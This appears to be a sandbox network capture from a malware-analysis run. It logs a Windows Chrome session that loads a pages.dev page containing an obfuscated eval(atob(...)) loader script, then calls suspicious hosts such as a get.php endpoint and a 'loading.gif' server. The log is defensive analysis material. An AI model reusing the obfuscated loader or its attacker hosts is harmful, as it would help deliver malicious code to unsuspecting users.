2024-08-31 22:54:35 UTC	813	IN	HTTP/1.1 308 Permanent Redirect Date: Sat, 31 Aug 2024 22:54:35 GMT Content-Length: 0 Connection: close Location: /890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 Access-Control-Allow-Origin: * referrer-policy: strict-origin-when-cross-origin Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BExF68hwlTptz8xeRSOIbLtyGLQeF5dsMhLPyHDW2v1hnkECCbRvweHf8HzSABRECpW92Wfl0v43wvzk7NF2ayxnaCyUvy1moV7vCq%2F%2FbeyY1HLX7RCHlK5QQofKy66Sn3woN7DY%2FJWBr2S1XdTx%2FaI3Nf2W4SzfIzHjIUuu2AiXVryC7HQ3ZQc8X5qcTtVKfu3oIO4W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a714dc97d26-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49726	172.66.47.41	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:36 UTC	919	OUT	GET /890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 HTTP/1.1 Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:36 UTC	790	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWD05Ghuyajbz7AzGKlN9kRsPUHJsV5PT%2BLZRRl6ZZan19AtAvFNNn8UpAp2GRQp2%2B%2FU3F9%2BY7wGFli%2B2Gi58ePaAVzZUZNSa5yB2q5InYmqf%2BwJ9VBHmjsxrx%2BT7rqBs%2FH0JF5tBTTWSVFDfvY2VOY0sJyTPprZdn4Ig79QYt1JOP2mVC5gdOkFDHBdweBUPZMOnDQG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a743f9a43fa-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 33 32 65 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 70 6a 71 74 61 6e 65 63 67 6b 69 6c 66 20 3d 20 27 64 7a 76 31 70 71 67 7a 78 61 36 32 37 35 74 65 27 3b 65 76 61 6c 28 61 74 6f 62 28 22 78 6d 59 64 73 6e 69 6d 49 79 47 6b 79 58 49 47 55 5a 68 69 6a 59 61 64 6d 46 79 49 47 39 69 50 53 63 6e 4c 48 6f 39 51 58 4a 79 59 58 6b 6f 4d 54 59 30 4b 54 74 36 57 7a 55 79 58 54 30 69 59 30 5a 73 56 47 46 73 57 6b 35 5a 62 46 4a 48 5a 44 46 73 64 47 46 36 52 6d 70 57 4d 44 51 78 55 31 64 77 4d 45 35 73 5a 44 5a 5a 4d 32 68 5a 56 6b 52 43 63 46 55 79 4e 55 4e 68 56 30 70 59 56 43 Data Ascii: 32ed<!DOCTYPE html><html><head><meta charset="UTF-8"></head><body><script>var pjqtanecgkilf = 'dzv1pqgzxa6275te';eval(atob("xmYdsnimIyGkyXIGUZhijYadmFyIG9iPScnLHo9QXJyYXkoMTY0KTt6WzUyXT0iY0ZsVGFsWk5ZbFJHZDFsdGF6RmpWMDQxU1dwME5sZDZZM2hZVkRCcFUyNUNhV0pYVC
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 64 32 56 47 56 6d 46 4e 62 58 68 53 56 32 35 77 51 31 52 47 56 6b 5a 68 52 6b 35 71 55 54 42 72 4d 31 70 58 65 48 70 6c 56 54 56 48 54 55 52 73 53 6d 4a 47 62 79 49 37 65 6c 73 34 4f 46 30 39 49 6c 49 7a 61 47 39 57 61 6b 70 54 5a 47 78 77 52 6c 52 74 4e 57 70 53 56 47 73 78 56 6c 5a 6a 4e 56 4e 74 52 6c 5a 4f 57 46 70 59 56 6e 70 47 63 56 6c 57 56 6a 42 57 52 54 56 59 59 30 64 77 54 6b 30 69 4f 33 70 62 4d 54 51 33 58 54 30 69 63 56 4e 55 51 6d 6c 4e 57 45 4a 56 57 57 74 53 61 32 45 78 53 58 68 58 61 6c 70 4b 59 57 35 52 4d 6c 59 7a 63 46 4a 4e 56 6d 68 56 54 55 64 73 54 31 4e 47 53 6e 4a 56 62 6e 42 7a 54 54 46 4f 57 43 49 37 65 6c 73 33 4e 31 30 39 49 6a 42 6f 55 32 51 78 5a 48 52 69 52 7a 56 6f 56 6a 41 78 4e 6c 5a 58 4e 58 4e 68 52 6c 6f 32 56 6d 35 Data Ascii: d2VGVmFNbXhSV25wQ1RGVkZhRk5qUTBrM1pXeHplVTVHTURsSmJGbyI7els4OF09IlIzaG9WakpTZGxwRlRtNWpSVGsxVlZjNVNtRlZOWFpYVnpGcVlWVjBWRTVYY0dwTk0iO3pbMTQ3XT0icVNUQmlNWEJVWWtSa2ExSXhXalpKYW5RMlYzcFJNVmhVTUdsT1NGSnJVbnBzTTFOWCI7els3N109IjBoU2QxZHRiRzVoVjAxNlZXNXNhRlo2Vm5
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 6a 74 36 57 7a 4d 30 58 54 30 69 53 6a 56 54 56 47 52 73 59 6b 68 4e 4d 46 52 56 57 58 64 50 56 57 78 79 5a 45 5a 53 54 31 64 46 4e 57 68 57 62 6e 42 58 5a 46 5a 77 52 6c 70 48 4e 55 78 4e 52 45 5a 57 56 44 46 6b 62 31 52 58 53 69 49 37 65 6c 73 35 4f 56 30 39 49 6b 6c 52 62 57 78 70 56 6d 74 76 65 56 64 72 61 48 4e 6a 62 56 4a 59 55 31 68 77 56 32 46 72 53 6d 68 57 4d 46 5a 33 55 32 78 6b 63 31 70 49 54 6d 6c 69 56 56 70 4b 56 6c 5a 6a 4e 56 52 47 56 58 6f 69 4f 33 70 62 4e 56 30 39 49 6c 52 47 56 6c 59 77 4e 54 42 55 4d 57 68 72 57 56 5a 6b 52 6d 49 7a 5a 47 46 57 61 7a 56 31 57 56 5a 61 64 31 4a 47 54 6c 6c 52 61 33 52 6f 56 6d 31 34 4d 6c 55 78 59 33 68 54 62 55 5a 58 55 57 77 69 4f 33 70 62 4d 6a 64 64 50 53 49 79 56 6c 64 77 52 31 64 48 53 6c 56 53 Data Ascii: jt6WzM0XT0iSjVTVGRsYkhNMFRVWXdPVWxyZEZST1dFNWhWbnBXZFZwRlpHNUxNREZWVDFkb1RXSiI7els5OV09IklRbWxpVmtveVdraHNjbVJYU1hwV2FrSmhWMFZ3U2xkc1pITmliVVpKVlZjNVRGVXoiO3pbNV09IlRGVlYwNTBUMWhrWVZkRmIzZGFWazV1WVZad1JGTllRa3RoVm14MlUxY3hTbUZXUWwiO3pbMjddPSIyVldwR1dHSlVS
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 78 53 54 31 70 47 51 6c 52 54 61 33 52 72 56 6c 64 34 56 6c 56 73 55 6d 74 68 4d 53 49 37 65 6c 73 78 4e 44 4a 64 50 53 4a 77 52 6d 51 78 61 46 56 4e 52 32 78 56 55 6b 55 31 56 46 6c 71 52 6e 64 58 52 6c 70 78 56 57 31 30 56 46 4a 59 51 6e 70 58 56 7a 42 34 55 6a 4a 4e 65 47 4e 49 55 6d 6c 54 52 54 56 6f 56 6a 42 56 49 6a 74 36 57 7a 45 31 4e 56 30 39 49 6e 6c 58 52 6c 46 33 59 56 5a 73 64 47 4a 46 54 6d 68 4e 57 45 4a 5a 56 6b 63 31 59 56 6c 57 53 58 68 58 62 47 52 58 56 6a 4e 53 65 6c 56 72 5a 45 70 6c 56 54 46 5a 57 6b 64 73 54 6d 46 73 57 6e 6f 69 4f 33 70 62 4d 54 45 79 58 54 30 69 56 32 78 6b 52 31 4e 75 5a 46 70 68 61 32 74 33 57 6b 5a 6b 54 32 52 47 57 6e 56 61 52 32 78 54 54 55 5a 77 65 46 59 79 65 45 39 69 4d 6b 31 33 5a 45 5a 73 54 6c 4a 55 56 Data Ascii: xST1pGQlRTa3RrVld4VlVsUmthMSI7elsxNDJdPSJwRmQxaFVNR2xVUkU1VFlqRndXRlpxVW10VFJYQnpXVzB4UjJNeGNIUmlTRTVoVjBVIjt6WzE1NV09InlXRlF3YVZsdGJFTmhNWEJZVkc1YVlWSXhXbGRXVjNSelVrZEplVTFZWkdsTmFsWnoiO3pbMTEyXT0iV2xkR1NuZFpha2t3WkZkT2RGWnVaR2xTTUZweFYyeE9iMk13ZEZsTlJUV
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 4f 56 30 64 34 61 46 59 77 56 54 46 55 52 6d 77 32 55 31 64 73 55 45 30 7a 51 6d 6c 55 57 48 42 68 57 6b 5a 43 56 46 4e 72 65 46 4a 4e 53 45 49 79 56 32 74 57 62 31 55 79 55 58 6c 55 61 6c 6f 69 4f 33 70 62 4e 6a 5a 64 50 53 4a 4f 52 6d 4a 36 52 6d 46 57 52 54 56 4d 57 57 74 6b 55 31 4e 57 57 6e 56 69 52 32 78 6f 56 6c 56 77 54 56 5a 73 55 6b 4a 4f 56 6c 46 33 5a 55 68 57 55 6d 4a 58 61 48 46 5a 62 58 4d 78 59 7a 46 4e 49 6a 74 36 57 7a 55 33 58 54 30 69 52 32 68 55 56 54 49 78 53 32 52 57 56 6e 52 6c 52 33 42 70 59 6b 68 43 64 6c 64 58 64 45 39 69 4d 6b 70 59 56 57 78 6f 54 31 59 7a 51 6e 4a 56 61 6b 6f 30 54 57 78 73 64 47 4a 48 4e 57 70 53 4d 53 49 37 65 6c 73 35 4f 46 30 39 49 6d 52 7a 59 55 56 30 62 46 59 77 62 44 5a 56 4d 56 4a 68 57 56 64 4b 63 31 Data Ascii: OV0d4aFYwVTFURmw2U1dsUE0zQmlUWHBhWkZCVFNreFJNSEIyV2tWb1UyUXlUaloiO3pbNjZdPSJORmJ6RmFWRTVMWWtkU1NWWnViR2xoVlVwTVZsUkJOVlF3ZUhWUmJXaHFZbXMxYzFNIjt6WzU3XT0iR2hUVTIxS2RWVnRlR3BpYkhCdldXdE9iMkpYVWxoT1YzQnJVako0TWxsdGJHNWpSMSI7els5OF09ImRzYUV0bFYwbDZVMVJhWVdKc1
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 63 48 70 5a 56 45 70 54 55 30 5a 77 4e 6d 4a 48 52 69 49 37 65 6c 73 35 4d 6c 30 39 49 6c 5a 58 4e 57 46 58 62 55 5a 59 59 55 68 4f 56 45 31 56 4e 44 42 5a 56 33 68 44 56 30 55 31 57 47 56 48 64 47 78 57 56 58 42 46 56 31 64 30 61 6b 35 58 52 6c 5a 6b 52 57 52 72 55 6a 4a 6f 57 6c 59 69 4f 33 70 62 4d 6a 42 64 50 53 4a 69 52 7a 56 6f 56 6d 31 34 56 31 6c 56 57 6b 39 55 62 45 6c 33 54 6c 56 77 56 31 4a 73 53 6d 68 57 52 6d 52 58 56 6c 64 4b 53 56 46 73 61 46 64 69 56 32 68 52 56 31 52 43 59 57 4e 74 56 6e 4e 53 49 6a 74 36 57 7a 45 7a 4e 46 30 39 49 6b 35 70 56 6c 68 53 53 56 5a 73 61 46 64 68 56 6b 6c 34 56 32 70 47 57 47 46 72 4e 56 52 5a 62 6d 78 4b 54 6a 4a 57 63 32 4e 36 54 6b 35 4e 56 45 45 31 55 31 63 78 61 32 4e 47 56 6b 64 55 61 33 41 69 4f 33 70 Data Ascii: cHpZVEpTU0ZwNmJHRiI7els5Ml09IlZXNWFXbUZYYUhOVE1VNDBZV3hDV0U1WGVHdGxWVXBFV1d0ak5XRlZkRWRrUjJoWlYiO3pbMjBdPSJiRzVoVm14V1lVWk9UbEl3TlVwV1JsSmhWRmRXVldKSVFsaFdiV2hRV1RCYWNtVnNSIjt6WzEzNF09Ik5pVlhSSVZsaFdhVkl4V2pGWGFrNVRZbmxKTjJWc2N6Tk5NVEE1U1cxa2NGVkdUa3AiO3p
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 55 35 47 59 30 68 6b 57 6d 4a 55 52 6e 46 5a 61 6b 46 34 56 6b 64 46 65 6c 5a 74 63 45 35 4e 52 58 41 32 56 31 5a 61 62 31 56 74 53 6a 56 54 56 47 51 69 4f 33 70 62 4d 54 45 31 58 54 30 69 64 32 56 49 55 6d 78 54 52 6e 42 68 56 46 64 73 53 6b 34 79 56 6e 4e 6a 65 6b 5a 4f 56 6d 70 42 4e 56 4e 58 4d 54 42 4f 62 48 42 48 59 55 56 6b 54 6d 4a 49 51 6c 70 5a 61 31 4a 58 56 44 4a 47 63 79 49 37 65 6c 73 78 4d 46 30 39 49 6b 35 77 56 48 70 4f 64 31 6c 72 4d 56 56 68 52 31 4a 52 56 54 42 77 53 31 56 55 51 6b 74 54 56 6c 5a 30 5a 45 64 30 59 57 4a 46 63 44 46 57 62 54 56 58 56 45 5a 46 65 57 4e 36 54 6c 4e 53 61 31 6f 69 4f 33 70 62 4d 7a 6c 64 50 53 4a 54 54 56 5a 73 4e 56 64 57 57 6d 74 55 4d 6b 70 47 5a 55 5a 73 59 56 4e 46 53 6d 68 56 4d 46 70 4c 5a 47 74 73 Data Ascii: U5GY0hkWmJURnFZakF4VkdFelZtcE5NRXA2V1Zab1VtSjVTVGQiO3pbMTE1XT0id2VIUmxTRnBhVFdsSk4yVnNjekZOVmpBNVNXMTBObHBHYUVkTmJIQlpZa1JXVDJGcyI7elsxMF09Ik5wVHpOd1lrMVVhR1JRVTBwS1VUQktTVlZ0ZEd0YWJFcDFWbTVXVEZFeWN6TlNSa1oiO3pbMzldPSJTTVZsNVdWWmtUMkpGZUZsYVNFSmhVMFpLZGts
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 68 53 61 30 70 56 49 6a 74 36 57 7a 63 35 58 54 30 69 53 31 59 79 55 6c 68 56 61 32 68 58 59 6d 31 34 55 31 5a 71 54 6d 39 6b 4d 57 52 78 55 31 52 47 55 31 59 77 57 6c 70 57 4d 57 4d 31 56 45 5a 6b 53 56 56 59 62 46 68 57 62 57 68 4c 56 32 70 4b 52 79 49 37 65 6c 73 78 4e 44 56 64 50 53 4a 57 53 6a 5a 57 56 46 5a 54 55 6d 74 61 4d 6c 70 48 64 44 42 6a 52 6b 5a 5a 59 30 64 73 55 30 31 57 56 58 64 54 56 33 41 77 54 6d 78 6b 4e 6c 4e 55 56 6c 6c 57 52 45 4a 77 56 44 46 6f 55 31 64 73 49 6a 74 36 57 7a 4d 77 58 54 30 69 55 6b 39 68 4d 44 42 33 5a 55 68 53 59 56 4e 47 63 48 42 55 56 32 78 4b 54 6a 4a 57 63 32 4d 7a 63 45 35 4e 56 45 45 31 55 31 64 77 63 30 31 57 55 6b 68 4f 56 6b 70 4e 54 57 73 78 4e 56 56 74 63 43 49 37 65 6c 73 32 4f 46 30 39 49 6d 52 48 62 Data Ascii: hSa0pVIjt6Wzc5XT0iS1YyUlhVa2hXYm14U1ZqTm9kMWRxU1RGU1YwWlpWMWM1VEZkSVVYbFhWbWhLV2pKRyI7elsxNDVdPSJWSjZWVFZTUmtaMlpHdDBjRkZZY0dsU01WVXdTV3AwTmxkNlNUVllWREJwVDFoU1dsIjt6WzMwXT0iUk9hMDB3ZUhSYVNGcHBUV2xKTjJWc2MzcE5NVEE1U1dwc01WUkhOVkpNTWsxNVVtcCI7els2OF09ImRHb
2024-08-31 22:54:36 UTC	1369	IN	Data Raw: 55 62 57 78 4f 59 58 70 57 64 6c 64 72 56 6d 74 6a 4d 6c 4a 30 55 32 35 43 54 31 5a 36 62 47 46 57 49 6a 74 36 57 7a 63 77 58 54 30 69 61 47 46 6c 62 58 68 57 56 46 64 30 64 32 56 47 5a 48 4e 61 52 54 6c 4f 55 6c 68 6f 4d 46 70 46 5a 44 52 69 52 6d 52 47 54 56 68 61 57 6d 4a 48 61 48 70 57 56 56 70 7a 5a 45 64 4f 52 56 4e 58 62 43 49 37 65 6c 73 78 4d 54 64 64 50 53 4a 46 4f 56 5a 52 4d 47 73 7a 57 6c 64 34 65 6b 31 72 4d 48 68 4e 52 47 78 4b 59 54 46 73 4d 31 64 57 57 6d 70 4f 56 31 4a 57 5a 55 68 57 56 57 4a 59 61 47 46 57 4d 46 5a 33 59 31 5a 73 56 6c 52 55 49 6a 74 36 57 7a 6b 77 58 54 30 69 53 6e 46 55 56 7a 45 30 59 30 5a 73 56 31 70 45 55 6d 70 53 4d 55 70 4b 57 56 68 77 59 57 46 47 53 58 6c 6c 53 45 70 59 59 54 4a 53 57 46 70 47 56 54 56 4f 56 6b Data Ascii: UbWxOYXpWdldrVmtjMlJ0U25CT1Z6bGFWIjt6WzcwXT0iaGFlbXhWVFd0d2VGZHNaRTlOUlhoMFpFZDRiRmRGTVhaWmJHaHpWVVpzZEdORVNXbCI7elsxMTddPSJFOVZRMGszWld4ek1rMHhNRGxKYTFsM1dWWmpOV1JWZUhWVWJYaGFWMFZ3Y1ZsVlRUIjt6WzkwXT0iSnFUVzE0Y0ZsV1pEUmpSMUpKWVhwYWFGSXllSEpYYTJSWFpGVTVOVk
2024-08-31 22:54:36 UTC	724	IN	Data Raw: 49 6c 64 72 4d 48 68 58 61 6b 4a 59 59 6b 64 4e 65 46 52 56 56 6a 42 57 52 54 56 5a 59 6b 64 47 56 30 31 47 63 48 6c 58 62 46 70 50 59 6a 4a 4b 57 46 56 73 61 45 70 68 62 6c 45 79 56 6a 4e 77 61 6b 30 69 4f 33 70 62 4d 54 59 7a 58 54 30 69 4d 47 4a 58 64 79 74 45 55 54 30 39 49 6a 74 36 57 7a 55 31 58 54 30 69 59 57 56 72 53 6b 31 57 56 56 5a 4f 54 6c 64 46 65 56 4a 73 62 46 68 56 4d 31 4a 47 56 6c 5a 6a 4e 45 35 47 62 44 5a 54 61 7a 6c 73 56 6a 42 61 57 6c 56 58 63 45 4e 54 62 45 35 47 54 6c 52 57 57 43 49 37 65 6c 73 79 58 54 30 69 4d 54 4a 5a 57 45 6c 6e 59 6d 31 57 63 6d 4e 48 55 6e 52 61 61 55 45 35 53 55 4e 6b 64 32 51 79 54 6d 39 5a 61 6b 59 31 59 32 70 53 65 47 52 71 57 6a 52 69 52 33 51 31 57 6e 6c 6a 4e 30 52 58 56 69 49 37 65 6c 73 30 58 54 30 Data Ascii: IldrMHhXakJYYkdNeFRVVjBWRTVZYkdGV01GcHlXbFpPYjJKWFVsaEphblEyVjNwak0iO3pbMTYzXT0iMGJXdytEUT09Ijt6WzU1XT0iYWVrSk1WVVZOTldFeVJsbFhVM1JGVlZjNE5GbDZTazlsVjBaWlVXcENTbE5GTlRWWCI7elsyXT0iMTJZWElnYm1WcmNHUnRaaUE5SUNkd2QyTm9ZakY1Y2pSeGRqWjRiR3Q1WnljN0RXViI7els0XT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49729	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:36 UTC	360	OUT	GET /get.php HTTP/1.1 Host: fetchlnk.truesharingzone.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:37 UTC	274	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.0.30 access-control-allow-origin: * content-type: text/html; charset=UTF-8 content-length: 0 date: Sat, 31 Aug 2024 22:54:37 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49727	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:37 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-31 22:54:37 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF70) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=237063 Date: Sat, 31 Aug 2024 22:54:37 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49731	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:38 UTC	677	OUT	GET /thegifloader/loading.gif HTTP/1.1 Host: theextrenalfiles.filesdistributorin.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:38 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Sat, 07 Sep 2024 22:54:38 GMT content-type: image/gif last-modified: Fri, 21 Jun 2024 11:56:27 GMT accept-ranges: bytes content-length: 68682 date: Sat, 31 Aug 2024 22:54:38 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-31 22:54:38 UTC	16384	IN	Data Raw: 47 49 46 38 39 61 64 00 64 00 d5 00 00 04 02 04 8c 8a 8c 44 42 44 c4 c6 c4 24 22 24 64 62 64 ac aa ac e4 e6 e4 14 12 14 9c 9a 9c 54 52 54 d4 d6 d4 34 32 34 74 72 74 bc ba bc f4 f6 f4 0c 0a 0c 94 92 94 4c 4a 4c cc ce cc 2c 2a 2c 6c 6a 6c b4 b2 b4 ec ee ec 1c 1a 1c a4 a2 a4 5c 5a 5c dc de dc 3c 3a 3c 7c 7a 7c c4 c2 c4 fc fe fc 04 06 04 8c 8e 8c 44 46 44 cc ca cc 24 26 24 64 66 64 ac ae ac ec ea ec 14 16 14 9c 9e 9c 54 56 54 dc da dc 34 36 34 74 76 74 bc be bc fc fa fc 0c 0e 0c 94 96 94 4c 4e 4c d4 d2 d4 2c 2e 2c 6c 6e 6c b4 b6 b4 f4 f2 f4 1c 1e 1c a4 a6 a4 5c 5e 5c e4 e2 e4 3c 3e 3c 7c 7e 7c ff ff ff 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 09 00 3e 00 2c 00 00 00 00 64 00 64 00 00 06 fe 40 9f ef 23 2c 1a 8b af e1 71 99 Data Ascii: GIF89addDBD$"$dbdTRT424trtLJL,*,ljl\Z\<:<\|z\|DFD$&$dfdTVT464tvtLNL,.,lnl\^\<><\|~\|!NETSCAPE2.0!>,dd@#,q
2024-08-31 22:54:38 UTC	6016	IN	Data Raw: b8 24 07 30 69 82 69 00 ce 76 c2 11 25 6e f2 40 cb a2 11 8e 72 8e 73 83 02 72 b0 ca 55 62 72 03 cc 79 62 fb 8e e1 43 62 79 11 44 07 f0 00 01 30 c9 4c 1a 44 00 20 d8 78 5d e5 28 d8 3d 1b f2 21 91 32 8a c5 e6 1e 80 81 05 f8 b2 97 36 b8 4c 1f db d6 b7 95 6d 4c 47 a3 ec 1b e7 7a a7 4d 39 b4 40 02 cc 64 66 02 46 e0 ba 82 70 6c 88 50 6b a3 d9 b6 97 36 55 f8 51 08 0f 70 c0 32 2f c9 00 0e 6c a0 00 1e 0c 1c 91 e4 56 c2 5b b4 8e 71 c3 23 ce b7 20 ca 28 22 34 80 03 ab 2c 28 05 02 70 82 c8 99 88 70 b1 f3 ce 39 85 97 c2 b4 e5 ae 42 60 0a c4 45 2f fe 49 02 13 a8 40 98 d3 9c a3 e5 10 94 c5 9e 21 f2 08 01 a5 80 0c 5a 60 42 a9 a4 43 03 01 08 81 0e 74 27 d1 8b 24 4b 05 0a 80 4e 31 69 5a 4b 79 e1 66 4f 4e 63 df 03 2c a0 29 07 f0 c9 65 4b 9c c0 00 3a 30 81 26 d6 d4 1c a8 29 Data Ascii: $0iiv%n@rsrUbrybCbyD0LD x](=!26LmLGzM9@dfFplPk6UQp2/lV[q# ("4,(pp9B`E/I@!Z`BCt'$KN1iZKyfONc,)eK:0&)
2024-08-31 22:54:38 UTC	16384	IN	Data Raw: 97 99 70 5c 85 4e 7e 5b 92 4e 7d 9b 66 81 16 30 30 a4 a2 a5 9f a2 83 69 a9 a8 6f 54 53 4d 93 8e 8d b3 39 24 23 05 24 be c5 c6 8a 66 b5 58 5a c9 66 2a 00 00 0c 89 71 b8 62 9c 74 b1 cc cd a3 74 94 39 09 1e d0 0f 09 c7 e5 c8 65 bb 77 b8 4e 09 0f d0 1e e4 dc a8 a7 c8 f3 c7 af aa dd ca 85 93 e0 e2 f1 a0 a8 84 a9 a7 68 60 a8 2c 76 c6 ac c3 72 62 81 8c 13 cb 12 2a 69 f7 2e 1e b7 4c 0d 17 40 44 83 70 19 9e 2f 98 16 32 39 00 ed 40 35 90 47 fc 01 18 97 6b 4e 17 3f 16 48 02 30 59 4f 12 21 6f 8d 12 b4 78 97 a2 13 fe 37 8a 00 e0 79 3a e2 25 45 38 00 2d 36 b2 e1 44 a8 e3 a3 74 87 06 da ec 62 e1 02 34 00 31 36 26 7b 59 4d e5 b8 97 8f 68 bd 4c a0 e0 ea 85 13 60 a5 56 03 43 6a ce cd b6 7f b8 b6 2d b5 e0 28 80 15 bd dc 82 05 2a 54 93 35 0b 2b ae 7a 58 50 25 e4 be 30 5c 95 Data Ascii: p\N~[N}f00ioTSM9$#$fXZfqbtt9ewNh`,vrbi.L@Dp/29@5GkN?H0YO!ox7y:%E8-6Dtb416&{YMhL`VCj-(*T5+zXP%0\
2024-08-31 22:54:38 UTC	16384	IN	Data Raw: 7e b3 2d a5 27 53 a0 2e 12 4c 03 06 23 38 91 6f 41 79 4c 3b 91 72 95 0b 4c 01 09 6c 80 ad e3 0a 81 41 6c 41 c1 a6 f0 eb 5c 83 29 94 6f 1b 43 a8 1c 2e e6 ae f9 d4 87 33 cc ac e5 6e 7b a9 3d 41 e8 b7 67 81 ca c9 06 b4 c3 96 ee 90 56 78 c0 fc 65 85 a7 8b 59 f6 ae cc 00 03 c5 c2 6f a0 11 9c 9c c1 eb a5 96 a5 66 35 15 ac 5f 6b b9 d7 54 6f 05 00 0b d2 6b 88 14 47 f3 9f 6b f0 99 7b 87 99 98 77 3c 4b bd 33 fe dc 68 e9 7a 40 24 b9 2e 0f 00 03 db 26 bf f9 8d d5 42 c3 2d c3 c9 8d 8b ee 2a 4d 3d 65 f3 16 78 b8 70 7f 25 25 19 a6 b0 18 20 37 1d e0 f7 60 79 b0 1b 3a b9 ac 66 b0 98 c5 86 77 bf 99 d4 64 c4 05 15 0d 01 33 3b 39 57 9e ee a0 ec e5 ef 8d 1f da e7 0d 64 e4 a3 64 86 68 9b 24 3a 55 25 5d b3 20 d0 13 72 07 6f 78 16 1c e1 54 7b 51 92 84 84 01 8a 0d 9e 62 1e 6e 6a Data Ascii: ~-'S.L#8oAyL;rLlAlA\)oC.3n{=AgVxeYof5_kTokGk{w<K3hz@$.&B-*M=exp%% 7`y:fwd3;9Wddh$:U%] roxT{Qbnj
